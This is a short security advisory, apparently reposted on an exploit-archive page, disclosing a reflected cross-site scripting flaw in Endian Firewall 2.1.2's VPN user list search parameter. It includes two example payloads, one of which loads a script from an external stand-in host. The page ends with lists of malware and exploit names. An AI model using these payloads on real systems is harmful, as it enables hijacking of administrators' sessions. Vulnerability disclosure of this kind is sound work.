endian-xss.txt

Posted on 29 January 2008

#Security Advisory - Multiple Vulnerabilities in Endian firewall# Endian Firewall is a "turn-key" linux security distribution that turns every system into a full featured security appliance. It features stateful packet filtering, proxies, antivirus/antispam, content filtering and a VPN module. Date : 01-28-2008 Product : Endian Firewall Version : 2.1.2 - Prior version maybe also be affected Vendor : http://www.endian.com/en/ Author : syniack Contact : syniack@gmail.com S.Page : http://bsecure.net.pk XSS Vulnerability: [TESTED] Security issue in the following file: vpnum/userslist.php?psearch=xss Example: http://www.example.com/vpnum/userslist.php?psearch="><scriptsrc=http://www.example2.com/re.js></script> http://www.example.com/vpnum/userslist.php?psearch="><script>alert(1);</script>

TOP

Malware :

Backdoor:Linux/IoTReaper
Ransom:Linux/Erebus.A
Backdoor:Linux/Luabot.A
DDoS:Linux/Zanich!rfn
Linux.Mokes

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20